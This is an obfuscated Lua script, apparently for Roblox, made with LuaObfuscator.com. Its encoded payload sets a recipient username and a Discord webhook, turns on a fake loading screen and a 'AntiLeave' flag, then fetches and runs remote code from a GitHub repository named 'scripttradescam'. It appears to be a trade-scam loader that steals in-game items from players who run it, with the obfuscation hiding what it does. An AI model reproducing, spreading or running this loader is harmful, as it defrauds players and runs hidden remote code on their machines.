--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.9.12) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then local v81=0;while true do if (v81==0) then v19=v0(v3(v30,1,1));return "";end end else local v82=v2(v0(v30,16));if v19 then local v91=v5(v82,v19);v19=nil;return v91;else return v82;end end end);local function v20(v31,v32,v33)if v33 then local v83=0 -0 ;local v84;while true do if (v83==(0 -0)) then v84=(v31/((3 -1)^(v32-(1 -0))))%(((1069 -(68 + 997)) -(1272 -(226 + 1044)))^(((v33-1) -(v32-(620 -((2416 -1861) + 64)))) + (932 -(857 + 74)))) ;return v84-(v84%(569 -(367 + (318 -(32 + 85))))) ;end end else local v85=927 -(214 + 713) ;local v86;while true do if (v85==(0 + 0)) then v86=(1 + 1)^(v32-(878 -(282 + 595))) ;return (((v31%(v86 + v86))>=v86) and (1638 -(1523 + 114))) or (0 + 0 + 0) ;end end end end local function v21()local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22()local v35=0;local v36;local v37;while true do if (v35==(1 + 0)) then return (v37 * (1213 -(892 + 65))) + v36 ;end if (v35==(0 -(350 -(87 + 263)))) then v36,v37=v1(v16,v18,v18 + 2 );v18=v18 + (3 -1) ;v35=(181 -(67 + 113)) -0 ;end end end local function v23()local v38,v39,v40,v41=v1(v16,v18,v18 + 3 + 0 );v18=v18 + (9 -5) ;return (v41 * 16777216) + (v40 * (48199 + 17337)) + (v39 * (1017 -761)) + v38 ;end local function v24()local v42=952 -(802 + (1636 -(998 + 488))) ;local v43;local v44;local v45;local v46;local v47;local v48;while true do if (v42==(0 -0)) then v43=v23();v44=v23();v42=1 -0 ;end if (v42==(3 + 0)) then if (v47==(997 -(915 + 82))) then if (v46==(0 -0)) then return v48 * 0 ;else v47=1 + 0 ;v45=0 -0 ;end elseif (v47==(3234 -(1069 + 38 + 80))) then return ((v46==0) and (v48 * ((2 -1)/0))) or (v48 * NaN) ;end return v8(v48,v47-(2237 -1214) ) * (v45 + (v46/(2^(10 + 42)))) ;end if (v42==(3 -1)) then v47=v20(v44,21 + 0 ,822 -(368 + 423) );v48=((v20(v44,32)==(3 -2)) and  -1) or (19 -(10 + 7 + 1)) ;v42=(783 -(201 + 571)) -8 ;end if (v42==((1581 -(116 + 1022)) -((1731 -1315) + 26))) then v45=3 -2 ;v46=(v20(v44,1 + 0 ,35 -15 ) * ((440 -(145 + 293))^32)) + v43 ;v42=432 -(44 + 227 + 159) ;end end end local function v25(v49)local v50=1080 -(1020 + 60) ;local v51;local v52;while true do if (v50==(7 -5)) then v52={};for v92=3 -(1 + 1) , #v51 do v52[v92]=v2(v1(v3(v51,v92,v92)));end v50=862 -(814 + 45) ;end if (v50==(0 -0)) then v51=nil;if  not v49 then v49=v23();if (v49==0) then return "";end end v50=1 + 0 ;end if (v50==(2 + 1)) then return v6(v52);end if (v50==(1748 -(760 + 987))) then v51=v3(v16,v18,(v18 + v49) -(886 -(261 + 624)) );v18=v18 + v49 ;v50=(7 -4) -1 ;end end end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v53=0 -0 ;local v54;local v55;local v56;local v57;local v58;local v59;local v60;while true do if (v53==(2 -1)) then v56=nil;v57=nil;v53=2;end if (v53==3) then v60=nil;while true do local v94=0 -0 ;while true do if (v94==(1637 -(1373 + 263))) then if (v54==(1000 -(451 + 549))) then v55={};v56={};v57={};v58={v55,v56,nil,v57};v54=1;end break;end if (v94==0) then if (v54==(3 -1)) then local v109=0;while true do if ((0 + 0)==v109) then for v133=1,v23() do local v134=0 -0 ;local v135;local v136;while true do if (v134~=1) then else while true do if ((0 -0)~=v135) then else v136=v21();if (v20(v136,1 + 0 ,1 + 0 )==(1384 -(746 + 638))) then local v185=0 -0 ;local v186;local v187;local v188;local v189;while true do if (v185==(0 -0)) then local v191=0 + 0 ;while true do if (v191~=1) then else v185=1 -0 ;break;end if (v191==(341 -(218 + 123))) then v186=1581 -(1535 + 46) ;v187=nil;v191=1 + 0 ;end end end if (v185~=(1 + 0)) then else local v192=0;while true do if (1==v192) then v185=562 -(306 + 254) ;break;end if ((0 + 0)~=v192) then else local v195=0;while true do if (v195~=0) then else v188=nil;v189=nil;v195=1 + 0 ;end if (v195~=(2 -1)) then else v192=1 + 0 ;break;end end end end end if ((733 -(476 + 255))==v185) then while true do if ((0 -0)~=v186) then else local v196=1467 -(899 + 568) ;while true do if ((0 + 0)~=v196) then else local v207=0;while true do if (v207==(0 -0)) then v187=v20(v136,2 + 0 ,606 -(268 + 335) );v188=v20(v136,4,296 -(60 + 230) );v207=573 -(426 + 146) ;end if (v207==1) then v196=1;break;end end end if (v196~=(1 + 0)) then else v186=1;break;end end end if ((1458 -(282 + 1174))~=v186) then else local v197=0;local v198;local v199;while true do if ((0 + 0)==v197) then v198=0 -0 ;v199=nil;v197=812 -(569 + 242) ;end if (v197~=(337 -(144 + 192))) then else while true do if (v198==0) then v199=0 -0 ;while true do if (v199==(1 + 0)) then v186=1027 -(706 + 318) ;break;end if ((1251 -(721 + 530))==v199) then local v208=0 + 0 ;while true do if ((1272 -(945 + 326))==v208) then v199=1505 -(363 + 1141) ;break;end if (v208~=(0 -0)) then else if (v20(v188,1 + 0 ,1)==1) then v189[702 -(271 + 429) ]=v60[v189[2]];end if (v20(v188,2,2 + 0 )==(1501 -(1408 + 92))) then v189[1089 -(461 + 625) ]=v60[v189[1291 -(993 + 295) ]];end v208=1 + 0 ;end end end end break;end end break;end end end if (v186~=(1174 -(418 + 753))) then else if (v20(v188,3,2 + 1 )==1) then v189[4]=v60[v189[1937 -(565 + 1368) ]];end v55[v133]=v189;break;end if (v186==(1 + 0)) then local v201=0 -0 ;local v202;local v203;while true do if (v201~=(1662 -(1477 + 184))) then else while true do if (v202==0) then v203=0 + 0 ;while true do if (v203==(1 -0)) then v186=1 + 1 ;break;end if (v203~=(529 -(406 + 123))) then else local v209=0 -0 ;while true do if (v209==(0 -0)) then v189={v22(),v22(),nil,nil};if (v187==(0 + 0)) then local v214=476 -(41 + 435) ;local v215;while true do if (v214~=(1769 -(1749 + 20))) then else v215=1001 -(938 + 63) ;while true do if (v215==(0 + 0)) then v189[3]=v22();v189[4]=v22();break;end end break;end end elseif (v187==(1323 -(1249 + 73))) then v189[3 + 0 ]=v23();elseif (v187==(1 + 1)) then v189[3]=v23() -((1147 -(466 + 679))^(6 + 10)) ;elseif (v187==3) then local v220=1613 -(1565 + 48) ;local v221;local v222;while true do if (v220~=(1 + 0)) then else while true do if (v221==(0 -0)) then v222=0 -0 ;while true do if (v222==(1900 -(106 + 1794))) then v189[1 + 2 ]=v23() -((1 + 1)^16) ;v189[4]=v22();break;end end break;end end break;end if (v220==(0 -0)) then v221=0 -0 ;v222=nil;v220=1 + 0 ;end end end v209=3 -2 ;end if (v209==(115 -(4 + 110))) then v203=585 -(57 + 527) ;break;end end end end break;end end break;end if (v201==(1427 -(41 + 1386))) then v202=0 -0 ;v203=nil;v201=104 -(17 + 86) ;end end end end break;end end end break;end end break;end if (v134~=(0 + 0)) then else v135=0;v136=nil;v134=1 -0 ;end end end for v137=1,v23() do v56[v137-(2 -1) ]=v28();end v109=167 -(122 + 44) ;end if (v109~=(1 -0)) then else return v58;end end end if (v54~=(1 + 0)) then else local v110=0 -0 ;while true do if (1==v110) then for v139=1,v59 do local v140=0 -0 ;local v141;local v142;local v143;local v144;local v145;while true do if ((1 + 0)==v140) then v143=nil;v144=nil;v140=1 + 1 ;end if (v140==(3 -1)) then v145=nil;while true do if (v141~=(67 -(30 + 35))) then else while true do if (v142==(1190 -(449 + 740))) then v145=nil;while true do if (v143==(0 + 0)) then local v193=1257 -(1043 + 214) ;while true do if (v193==(0 -0)) then local v204=1212 -(323 + 889) ;while true do if ((1 + 0)==v204) then v193=1;break;end if (v204~=0) then else v144=v21();v145=nil;v204=2 -1 ;end end end if (v193~=(581 -(361 + 219))) then else v143=1;break;end end end if (v143~=(321 -(53 + 267))) then else if (v144==(1 + 0)) then v145=v21()~=(0 + 0) ;elseif (v144==(415 -(15 + 398))) then v145=v24();elseif (v144==3) then v145=v25();end v60[v139]=v145;break;end end break;end if ((982 -(18 + 964))~=v142) then else local v190=0;while true do if (v190~=(0 -0)) then else v143=0 + 0 ;v144=nil;v190=2 -1 ;end if (v190~=1) then else v142=1 + 0 ;break;end end end end break;end if (v141==(1206 -(902 + 303))) then local v183=0;while true do if (v183==(850 -(20 + 830))) then v144=nil;v145=nil;v183=1 + 0 ;end if (v183~=(127 -(116 + 10))) then else v141=2;break;end end end if (v141==(0 -0)) then local v184=0 + 0 ;while true do if (v184==(739 -(542 + 196))) then v141=1;break;end if (0==v184) then v142=0 -0 ;v143=nil;v184=1 + 0 ;end end end end break;end if (v140~=(0 + 0)) then else v141=0;v142=nil;v140=1 + 0 ;end end end v58[1 + 2 ]=v21();v110=4 -2 ;end if (v110==0) then v59=v23();v60={};v110=1;end if (2==v110) then v54=2;break;end end end v94=2 -1 ;end end end break;end if (v53~=(214 -(22 + 192))) then else local v90=1551 -(1126 + 425) ;while true do if (v90~=0) then else v54=405 -(118 + 287) ;v55=nil;v90=3 -2 ;end if (v90==(1 -0)) then v53=766 -(468 + 297) ;break;end end end if (v53==(1123 -(118 + 1003))) then v58=nil;v59=nil;v53=3;end end end local function v29(v61,v62,v63)local v64=v61[1];local v65=v61[2];local v66=v61[3];return function(...)local v67=v64;local v68=v65;local v69=v66;local v70=v27;local v71=1;local v72= -1;local v73={};local v74={...};local v75=v12("#",...) -1 ;local v76={};local v77={};for v87=0,v75 do if (v87>=v69) then v73[v87-v69 ]=v74[v87 + 1 ];else v77[v87]=v74[v87 + 1 ];end end local v78=(v75-v69) + 1 ;local v79;local v80;while true do v79=v67[v71];v80=v79[1];if (v80<=5) then if (v80<=2) then if (v80<=0) then v77[v79[2]]=v79[3];v71=v71 + 1 ;v79=v67[v71];v63[v79[3]]=v77[v79[2]];v71=v71 + 1 ;v79=v67[v71];v77[v79[2]]=v79[3];v71=v71 + 1 ;v79=v67[v71];v63[v79[3]]=v77[v79[2]];v71=v71 + 1 ;v79=v67[v71];v77[v79[2]]=v79[3];v71=v71 + 1 ;v79=v67[v71];v63[v79[3]]=v77[v79[2]];v71=v71 + 1 ;v79=v67[v71];v77[v79[2]]=v63[v79[3]];v71=v71 + 1 ;v79=v67[v71];v77[v79[2]][v79[3]]=v79[4];v71=v71 + 1 ;v79=v67[v71];v77[v79[2]]=v63[v79[3]];v71=v71 + 1 ;v79=v67[v71];v77[v79[2]][v79[3]]=v79[4];elseif (v80==1) then local v111=0;local v112;local v113;while true do if (v111==1) then v77[v112 + 1 ]=v113;v77[v112]=v113[v79[4]];break;end if (v111==0) then v112=v79[2];v113=v77[v79[3]];v111=1;end end else local v114=0;local v115;local v116;local v117;local v118;while true do if (v114==2) then for v177=v115,v72 do v118=v118 + 1 ;v77[v177]=v116[v118];end break;end if (v114==1) then v72=(v117 + v115) -1 ;v118=0;v114=2;end if (v114==0) then v115=v79[2];v116,v117=v70(v77[v115](v13(v77,v115 + 1 ,v79[3])));v114=1;end end end elseif (v80<=3) then v77[v79[2]]=v79[3];elseif (v80==4) then local v119=0;local v120;while true do if (v119==0) then v120=v79[2];v77[v120]=v77[v120](v13(v77,v120 + 1 ,v72));break;end end else do return;end end elseif (v80<=8) then if (v80<=6) then v77[v79[2]][v79[3]]=v79[4];elseif (v80>7) then v77[v79[2]]=v79[3]~=0 ;else local v122=0;local v123;local v124;local v125;local v126;local v127;while true do if (v122==7) then v79=v67[v71];v77[v79[2]]();v71=v71 + 1 ;v79=v67[v71];do return;end break;end if (v122==1) then v71=v71 + 1 ;v79=v67[v71];v77[v79[2]]=v63[v79[3]];v71=v71 + 1 ;v79=v67[v71];v122=2;end if (v122==2) then v77[v79[2]]=v63[v79[3]];v71=v71 + 1 ;v79=v67[v71];v127=v79[2];v126=v77[v79[3]];v122=3;end if (v122==5) then v127=v79[2];v124,v125=v70(v77[v127](v13(v77,v127 + 1 ,v79[3])));v72=(v125 + v127) -1 ;v123=0;for v180=v127,v72 do v123=v123 + 1 ;v77[v180]=v124[v123];end v122=6;end if (v122==0) then v123=nil;v124,v125=nil;v126=nil;v127=nil;v77[v79[2]][v79[3]]=v79[4];v122=1;end if (v122==4) then v71=v71 + 1 ;v79=v67[v71];v77[v79[2]]=v79[3]~=0 ;v71=v71 + 1 ;v79=v67[v71];v122=5;end if (v122==6) then v71=v71 + 1 ;v79=v67[v71];v127=v79[2];v77[v127]=v77[v127](v13(v77,v127 + 1 ,v72));v71=v71 + 1 ;v122=7;end if (v122==3) then v77[v127 + 1 ]=v126;v77[v127]=v126[v79[4]];v71=v71 + 1 ;v79=v67[v71];v77[v79[2]]=v79[3];v122=4;end end end elseif (v80<=9) then v77[v79[2]]();elseif (v80>10) then v77[v79[2]]=v63[v79[3]];else v63[v79[3]]=v77[v79[2]];end v71=v71 + 1 ;end end;end return v29(v28(),{},v17)(...);end v15("LOL!0E3O0003083O00557365724E616D65030A3O00696F6E656C616E6B313003073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F2O313239383431372O363237313536313831392F362D5349694A734D5A737736582D6F792O4241784B716C676647646A4B545167357947595A615F59734668642O444E637348756F7139676244645F753958382O6C72326D03093O00557365724E616D653203023O005F47030D3O004C6F6164696E675363722O656E2O0103093O00416E74694C6561766503093O004D6F7573654C6F636B030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403353O00682O7470733A2O2F6769746875622E636F6D2F63617375626131322F73637269702O74726164657363616D2F74722O652F6D61696E00153O00124O00023O00124O00013O00124O00043O00124O00033O00124O00023O00124O00053O00124O00063O00304O0007000800124O00063O00304O0009000800120B3O00063O0030073O000A000800124O000B3O00122O0001000C3O00202O00010001000D00122O0003000E6O000400016O000100049O0000026O000100016O00017O00",v9(),...);
